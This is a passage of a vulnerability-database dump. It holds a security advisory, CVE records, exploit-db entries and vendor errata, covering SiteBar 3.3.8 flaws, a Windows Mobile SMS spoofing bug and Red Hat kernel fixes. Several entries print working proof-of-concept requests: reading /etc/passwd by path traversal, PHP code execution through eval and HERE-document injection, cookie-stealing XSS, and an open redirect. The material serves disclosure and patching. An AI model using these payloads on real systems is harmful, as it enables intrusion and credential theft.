execution, a malicious redirect and \r\nmultiple cases of Javascript injection.\r\n\r\nAfter liasing with the developers, the holes have been patched. 
Attached are \r\nthe advisory and patch relating to these flaws.\r\n\r\nCVEs open already relating to this audit:\r\n\r\n* CVE-2006-3320 (Javascript injection) - previously reported by other parties \r\nbut not resolved and so included for completeness\r\n\r\n* CVE-2007-5492 (code execution) - first reported in my attached advisory to \r\nthe vendor, independently rediscovered by Robert Buchholz of Gentoo whilst \r\nauditing the differences between the patched and unpatched versions (3.3.8 vs \r\n3.3.9)\r\n\r\n* CVE-2007-5491 (file permissions issue) - apparently patched by the vendor at \r\nthe same time as my issues were resolved and discovered by Robert Buchholz of \r\nGentoo whilst auditing the differences between the patched and unpatched \r\nversions (3.3.8 vs 3.3.9)\r\n\r\nIt is intended that CVE-2007-5492 will be updated to reference both code \r\nexecution flaws I reported. All other issues in the advisory have been \r\npatched but no CVEs have yet been requested or assigned to the best of my \r\nknowledge.\r\n\r\nTim\r\n-- \r\nTim Brown\r\n<mailto:timb@nth-dimension.org.uk>\r\n<http://www.nth-dimension.org.uk/>", "modified": "2007-10-20T00:00:00", "published": "2007-10-20T00:00:00", "id": "SECURITYVULNS:DOC:18237", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18237", "title": "Serious holes affecting SiteBar 3.3.8", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "The SMS handler for Windows Mobile 2005 Pocket PC Phone edition allows attackers to hide the sender field of an SMS message via a malformed WAP PUSH message that causes the PDU to be incorrectly decoded.", "modified": "2018-10-15T17:45:14", "published": "2007-10-17T20:17:00", "id": "CVE-2007-5493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5493", "title": "CVE-2007-5493", "type": "cve", 
"cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Absolute path traversal vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to read arbitrary files via an absolute path in the dir parameter, a different vulnerability than CVE-2007-5491.", "modified": "2018-10-15T17:46:03", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5694", "title": "CVE-2007-5694", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to integrator.php; (2) the token parameter in a New Password action, (3) the nid_acl parameter in a Folder Properties action, or (4) the uid parameter in a Modify User action to command.php; or (5) the target parameter to index.php, different vectors than CVE-2006-3320.", "modified": "2018-10-15T17:46:01", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5692", "title": "CVE-2007-5692", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Open redirect vulnerability in command.php in SiteBar 3.3.8 allows remote attackers to redirect users to arbitrary web sites via a URL in the forward parameter in a Log In action.", "modified": "2018-10-15T17:46:04", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5695", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5695", "title": "CVE-2007-5695", "type": 
"cve", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Eval injection vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to execute arbitrary PHP code via the edit parameter in an upd cmd action, a different vulnerability than CVE-2007-5492.", "modified": "2018-10-15T17:46:02", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5693", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5693", "title": "CVE-2007-5693", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:25:34", "bulletinFamily": "NVD", "description": "Memory leak in the Red Hat Content Accelerator kernel patch in Red Hat Enterprise Linux (RHEL) 4 and 5 allows local users to cause a denial of service (memory consumption) via a large number of open requests involving O_ATOMICLOOKUP.", "modified": "2017-09-28T21:29:38", "published": "2007-11-29T21:46:00", "id": "CVE-2007-5494", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5494", "title": "CVE-2007-5494", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T09:39:06", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to chmod arbitrary files to 0777 via \"..\" sequences in the lang parameter.", "modified": "2011-03-07T22:00:47", "published": "2007-10-17T15:17:00", "id": "CVE-2007-5491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5491", "type": "cve", "title": "CVE-2007-5491", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T10:51:38", 
"bulletinFamily": "NVD", "description": "Static code injection vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to execute arbitrary PHP code via the value parameter.", "modified": "2018-10-15T17:45:14", "published": "2007-10-17T15:17:00", "id": "CVE-2007-5492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5492", "title": "CVE-2007-5492", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:58", "bulletinFamily": "exploit", "description": "", "modified": "2007-10-22T00:00:00", "published": "2007-10-22T00:00:00", "href": "https://packetstormsecurity.com/files/60265/NDSA20071016.txt.html", "id": "PACKETSTORM:60265", "type": "packetstorm", "title": "NDSA20071016.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nNth Dimension Security Advisory (NDSA20071016) \nDate: 16th October 2007 \nAuthor: Tim Brown <mailto:timb@nth-dimension.org.uk> \nURL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> \nProduct: SiteBar 3.3.8 <http://www.sitebar.org/> \nVendor: Ond\u0159ej Brablc, David Szego and SiteBar Team <http://www.sitebar.org/> \nRisk: High \n \nSummary \n \nThis advisory comes in 4 related parts: \n \n1) SiteBar application has single high risk issues with its translation \nmodule. It can can be made to retrieve any file to which the web server user \nhas read access. \n \n2) SiteBar application has multiple high risk issues with its translation \nmodule. It can be made to execute arbitrary code to gain remote access \nas the web server user typically nobody. \n \n3) SiteBar application has multiple medium risk issues where it is vulnerable \nto Javascript injection within the requested URL. \n \n4) SiteBar application has single medium risk issue where it is vulnerable to \nmalicious redirects within the requested URL. 
\n \nTechnical Details \n \n1) The SiteBar application translation module can be made to read any \narbitrary file that the web server user has read access to, as it makes \nno sanity checks on the value passed within the dir parameter of the URL, \nfor example: \n \nhttp://192.168.1.1/translator.php?dir=/etc/passwd%00 \n \nNote the use of %00 to terminate the malicious and so prevent the intended \nstring concatenation occuring. \n \n2) The SiteBar application translation module can be forced into code \nexecution can occur in one of two ways. Firstly, it makes no sanity checks \non the value passed within the edit parameter prior to using the value as \npart of an eval() call, for example: \n \nhttp://192.168.1.1/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22); \n \nSecondly, whilst modifying strings within a translation, it makes no sanity \nchecks on the value passed for a given string to be embedded within a HERE \ndocument within the languages strings library. It is therefore possible to \nterminate the HERE document and pass arbitrary code which will be executed \nwhenever the languages strings library is included, for example: \n \nPOST http://192.168.1.1/translator.php?lang=test&edit=text HTTP/1.1 \nHost: 192.168.1.1 \nReferer: http://192.168.1.1/translator.php?lang=test&edit=text \nCookie: SB3COOKIE=1; SB3AUTH=3efab8d1dc9a149d7d1d7866a33d2539 \nContent-Type: application/x-www-form-urlencoded \nContent-length: 47497 \n \ndir=&label%5B0%5D=The+Bookmark+Server+for+Personal+and+Team+Use&md5%5B0%5D=823084516ae27478ec4c5fd40fb32ea8&value%5B0%5D=_P; \n \nsystem('id'); \n \n?> \n \nNote that _P terminates the HERE document. \n \n3) The values of the URL requested are used in within the web pages returned \nby the various scripts, in their unsanitised form. 
Specifically, it makes \nno sanity checks on the value passed within the multiple parameters of the \nURL, for example: \n \nhttp://192.168.1.1/integrator.php?lang=\"><script>alert('xss')</script> - Allows ' \nhttp://192.168.1.1/command.php?command=New+Password&uid=&token=\"><script>alert(document.cookie)</script> - Does not allow ' \nhttp://192.168.1.1/command.php?command=Folder%20Properties&nid_acl=%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ' \nhttp://192.168.1.1/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ' \nhttp://192.168.1.1/command.php?command='%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ', this one turned out to be CVE-2006-3320. \nhttp://192.168.1.1/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - Allows ' \n \nNote that CVE-2006-3320 had not been resolved at the time of testing, in \nSeptember 2007, and so we included it in our vulnerability report to the vendor \nfor completeness. \n \n4) Finally, the SiteBar can be made to redirect users to malicious locations, \nas it makes no checks on the value passed within the forward parameter of the URL, \nfor example: \n \nhttp://192.168.1.1/command.php?command=Log%20In&forward=http://www.google.com/ \n \nSolutions \n \nFollowing vendor notification on the 27th September 2007, the vendor promptly \nresponded with an initial patch on the 7th October which has been attached along \nwith this advisory and which resolved the reported issues. Nth Dimension would \nrecommend applying this patch as soon as possible. Alternatively, from 3.3.9 \n(available at http://sitebar.org/downloads.php) onwards also include this patch. \nNth Dimension would like to thank Ondraj from the SiteBar team for the way he \nworked to resolve the issue. 
\n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.6 (GNU/Linux) \n \niD8DBQFHFo3OVAlO5exu9x8RAhLWAJ0Vw4cessVBHnFMswYp6aDlmriDnwCfXpil \nwyDF4P/iRQ5Ab7FqJFutWBA= \n=Oqb/ \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/60265/NDSA20071016.txt"}], "seebug": [{"lastseen": "2017-11-19T21:53:43", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 26657\r\nCVE ID:CVE-2007-5494\r\nCNCVE ID:CNCVE-20075494\r\n\r\nRed Hat is a Linux-based operating system.\r\n The Red Hat memory accelerator has a memory leak issue; a local attacker can exploit the vulnerability to carry out a denial-of-service attack against the system.\r\nNo detailed vulnerability information is currently available.\n\nRedHat Enterprise Linux Desktop v.5 client\r\nRedHat Enterprise Linux v. 
5 server\r\n\n No vendor solution is available yet.", "modified": "2007-12-04T00:00:00", "published": "2007-12-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2540", "id": "SSV:2540", "type": "seebug", "title": "Red Hat Content Accelerator Memory Leak Local Denial of Service Vulnerability", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:55:52", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 26091\r\nCVE(CAN) ID: CVE-2007-5493\r\n\r\nWindows Mobile is an operating system for mobile phones developed by Microsoft.\r\n\r\nA security vulnerability exists in the Windows Mobile SMS handler: if a specially crafted WAP PUSH message is sent, the sender of the original SMS may be hidden on the recipient's phone.\r\n\r\nThe original PDU is shown in [1]. The following PDU causes the SMS handler of the Pocket PC Phone edition to decode the PDU incorrectly, so that both the sender's phone number and the send time are wrong.\r\n\r\n[1] PDU (line-wrapped)\r\n 079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA\r\n AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62\r\n 756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62\r\n 
696C652E636F6D000101\r\n\r\nSee [2] for the decoded PDU. When a SmartPhone receives this message, it discards it without any interaction, which also allows an attacker to determine whether the target phone is switched on without any confirmation from the SMS recipient.\r\n\r\n [2] PDU decoding\r\n\r\n PDU LENGTH IS 118 BYTES\r\n ADDRESS OF DELIVERING SMSC\r\n NUMBER IS : +447785016005\r\n TYPE OF NR. : International\r\n NPI : ISDN/Telephone (E.164/163)\r\n\r\n MESSAGE HEADER FLAGS\r\n MESSAGE TYPE : SMS SUBMIT\r\n REJECT DUPLICATES : NO\r\n VALIDITY PERIOD : RELATIVE\r\n REPLY PATH : NO\r\n USER DATA HEADER : PRESENT\r\n REQ. STATUS REPORT : NO\r\n MSG REFERENCE NR. : 34 (0x22)\r\n\r\n DESTINATION ADDRESS\r\n NUMBER IS : +447716299660\r\n TYPE OF NR. : International\r\n NPI : ISDN/Telephone (E.164/163)\r\n\r\n PROTOCOL IDENTIFIER (0x00)\r\n MESSAGE ENTITIES : SME-to-SME\r\n PROTOCOL USED : Implicit / SC-specific\r\n\r\n DATA CODING SCHEME (0x04)\r\n AUTO-DELETION : OFF\r\n COMPRESSION : OFF\r\n MESSAGE CLASS : NONE\r\n ALPHABET USED : 8bit data\r\n\r\n VALIDITY OF MESSAGE : 24.0 hrs\r\n\r\n USER DATA PART OF SM\r\n USER DATA LENGTH : 96 octets\r\n UDH LENGTH : 6 octets\r\n UDH : 05 04 0B 84 23 F0\r\n UDH ELEMENTS : 05 - Appl. 
port addressing 16bit\r\n 4 (0x04) Bytes Information Element\r\n 09200 : SOURCE port is: allocated by IANA\r\n 02948 : DESTINATION port is: allocated by IANA\r\n --- DATA ----------------------\r\n 05 04 0B 84 23 F0\r\n USER DATA (TEXT) : %&reg;&#129;\u00ea&macr;&#8218;&acute;&#8222;jE&AElig;\r\n symantec\u2026Symantec\r\n bulkSMS (Unregistered Ver) -\r\n LogixMobile.com\r\n\n\nMicrosoft Windows Mobile 5 PocketPC\n Vendor patch:\r\n\r\nMicrosoft\r\n---------\r\nThe vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:\r\n\r\nhttp://www.microsoft.com/technet/security/", "modified": "2007-10-23T00:00:00", "published": "2007-10-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2324", "id": "SSV:2324", "type": "seebug", "title": "Microsoft Windows Mobile SMS Handler Source Obfuscation Vulnerability", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:53:14", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access. CVE-2007-5694. 
Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30682", "href": "https://www.exploit-db.com/exploits/30682/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n\r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n\r\nThese issues include:\r\n\r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n\r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n\r\nSiteBar 3.3.8 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/translator.php?dir=/etc/passwd%00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30682/"}, {"lastseen": "2016-02-03T12:53:24", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution. CVE-2007-5693. 
Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30683", "href": "https://www.exploit-db.com/exploits/30683/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 translator.php upd cmd Action edit Variable Arbitrary PHP Code Execution", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/30683/"}, {"lastseen": "2016-02-03T12:53:54", "bulletinFamily": "exploit", "description": "SiteBar command.php Modify User Action uid Parameter XSS. CVE-2007-5692 . 
Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30686", "href": "https://www.exploit-db.com/exploits/30686/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable.\r\n\r\nhttp://www.example.com/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30686/"}, {"lastseen": "2016-02-03T12:53:35", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 integrator.php lang Parameter XSS. CVE-2007-5692. 
Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30684", "href": "https://www.exploit-db.com/exploits/30684/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 integrator.php lang Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/integrator.php?lang=\"><script>alert('xss')</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30684/"}, {"lastseen": "2016-02-03T12:53:45", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 index.php target Parameter XSS. CVE-2007-5692. 
Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30685", "href": "https://www.exploit-db.com/exploits/30685/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 index.php target Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable.\r\n\r\nhttp://www.example.com/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30685/"}], "oraclelinux": [{"lastseen": "2018-08-31T01:45:47", "bulletinFamily": "unix", "description": " [2.6.9-67.0.1.0.1.EL]\n - fix entropy flag in bnx2 driver to generate entropy pool (John \n Sobecki) [orabug 5931647]\n - fix enomem due to larger mtu size page alloc (Zach Brown) orabug 5486128\n - fix per_cpu() api bug_on with rds (Zach Brown) orabug 5760648\n \n [2.6.9-67.0.1]\n -kernel ieee80211 off-by-two integer underflow (Anton Arapov) [346361] \n {CVE-2007-4997}\n -fix for NFS attribute timeout handling (Fabio Leite) [371551]\n -fix bad schedule_timeout() call causing excessive delay (Jonathan \n Brassow) [399661]\n -do not return zero in mmap (Rik van Riel) [400811]\n -fs: fix missing dput in do_lookup error case leaks 
dentries (Eric \n Sandeen) [363461] {CVE-2007-5494}\n -s390: fix LTC39618-kernel panic making lcs interfaces online on LPAR \n (Hans-Joachim Picht) [400801]\n -x86_64: Fix incorrect logic in AMD NMI code (Prarit Bhargava) [404741]\n -scsi: fix diskdump performance regression on mpt fusion driver (Takao \n Indoh) [404781] ", "modified": "2007-12-20T00:00:00", "published": "2007-12-20T00:00:00", "id": "ELSA-2007-1104", "href": "http://linux.oracle.com/errata/ELSA-2007-1104.html", "title": "Important: kernel security and bug fix update ", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:38", "bulletinFamily": "unix", "description": " - CVE-2007-4571 ALSA memory disclosure flaw\n - Tick divider bugs on x86_64\n - CVE-2007-5494 open(O_ATOMICLOOKUP) leaks dentry \n - [PATCH] jbd: wait for already submitted t_sync_datalist buffer to complete (Possibility of in-place data destruction)\n - LSPP: audit rule causes kernel 'out of memory' condition and auditd failure\n - [EL5][BUG] Unexpected SIGILL on NFS/Montecito(ia64)\n - task->mm or slab corruption with CIFS\n - CVE-2007-4997 kernel ieee80211 off-by-two integer underflow\n - LSPP: audit enable not picking up all processes\n - [Broadcom 5.1.z bug] Performance regression on 5705 TG3 NICs\n - LTC35628-kexec/kdump kernel hung on Power5+ and Power6 based systems\n - LTC38135-vSCSI client reports 'Device sdX not ready' after deactive/active device on vSCSI server\n - forcedeth driver mishandles MSI interrupts under high load ", "modified": "2007-11-30T00:00:00", "published": "2007-11-30T00:00:00", "id": "ELSA-2007-0993", "href": "http://linux.oracle.com/errata/ELSA-2007-0993.html", "title": "Important: kernel security update ", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:41:22", "bulletinFamily": "unix", "description": 
"The kernel packages contain the Linux kernel, the core of any Linux\r\noperating system. \r\n\r\nThese updated packages fix the following security issues:\r\n\r\nA flaw was found in the handling of IEEE 802.11 frames, which affected\r\nseveral wireless LAN modules. In certain situations, a remote attacker\r\ncould trigger this flaw by sending a malicious packet over a wireless\r\nnetwork, causing a denial of service (kernel crash).\r\n(CVE-2007-4997, Important)\r\n\r\nA memory leak was found in the Red Hat Content Accelerator kernel patch.\r\nA local user could use this flaw to cause a denial of service (memory\r\nexhaustion). (CVE-2007-5494, Important)\r\n\r\nAdditionally, the following bugs were fixed:\r\n\r\n* when running the \"ls -la\" command on an NFSv4 mount point, incorrect\r\nfile attributes, and outdated file size and timestamp information were\r\nreturned. As well, symbolic links may have been displayed as actual files.\r\n\r\n* a bug which caused the cmirror write path to appear deadlocked after a\r\nsuccessful recovery, which may have caused syncing to hang, has been\r\nresolved.\r\n\r\n* a kernel panic which occurred when manually configuring LCS interfaces on\r\nthe IBM S/390 has been resolved.\r\n\r\n* when running a 32-bit binary on a 64-bit system, it was possible to\r\nmmap page at address 0 without flag MAP_FIXED set. This has been\r\nresolved in these updated packages.\r\n\r\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\r\ninterrupt counter in \"/proc/interrupts\" on systems running an AMD Opteron\r\nCPU. 
This caused systems running NMI Watchdog to restart at regular\r\nintervals.\r\n\r\n* a bug which caused the diskdump utility to run very slowly on devices\r\nusing Fusion MPT has been resolved.\r\n\r\nAll users are advised to upgrade to these updated packages, which resolve\r\nthese issues.", "modified": "2017-09-08T12:17:10", "published": "2007-12-19T05:00:00", "id": "RHSA-2007:1104", "href": "https://access.redhat.com/errata/RHSA-2007:1104", "type": "redhat", "title": "(RHSA-2007:1104) Important: kernel security and bug fix update", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:08", "bulletinFamily": "unix", "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nThese new kernel packages contain fixes for the following security issues:\r\n\r\nA memory leak was found in the Red Hat Content Accelerator kernel patch. A\r\nlocal user could use this flaw to cause a denial of service (memory\r\nexhaustion). (CVE-2007-5494, Important)\r\n\r\nA flaw was found in the handling of IEEE 802.11 frames affecting several\r\nwireless LAN modules. In certain circumstances, a remote attacker could\r\ntrigger this flaw by sending a malicious packet over a wireless network and\r\ncause a denial of service (kernel crash). (CVE-2007-4997, Important). \r\n\r\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A local\r\nuser who had the ability to read the /proc/driver/snd-page-alloc file could\r\nsee portions of kernel memory. (CVE-2007-4571, Moderate). 
\r\n\r\nIn addition to the security issues described above, several bug fixes\r\npreventing possible memory corruption, system crashes, SCSI I/O fails,\r\nnetworking drivers performance regression and journaling block device layer\r\nissue were also included.\r\n\r\nRed Hat Enterprise Linux 5 users are advised to upgrade to these packages,\r\nwhich contain backported patches to resolve these issues.\r\n\r\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil Kettle \r\nfor reporting the security issues corrected by this update.", "modified": "2017-09-08T12:06:07", "published": "2007-11-29T05:00:00", "id": "RHSA-2007:0993", "href": "https://access.redhat.com/errata/RHSA-2007:0993", "type": "redhat", "title": "(RHSA-2007:0993) Important: kernel security update", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:45:51", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:1104\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\r\noperating system. \r\n\r\nThese updated packages fix the following security issues:\r\n\r\nA flaw was found in the handling of IEEE 802.11 frames, which affected\r\nseveral wireless LAN modules. In certain situations, a remote attacker\r\ncould trigger this flaw by sending a malicious packet over a wireless\r\nnetwork, causing a denial of service (kernel crash).\r\n(CVE-2007-4997, Important)\r\n\r\nA memory leak was found in the Red Hat Content Accelerator kernel patch.\r\nA local user could use this flaw to cause a denial of service (memory\r\nexhaustion). (CVE-2007-5494, Important)\r\n\r\nAdditionally, the following bugs were fixed:\r\n\r\n* when running the \"ls -la\" command on an NFSv4 mount point, incorrect\r\nfile attributes, and outdated file size and timestamp information were\r\nreturned. 
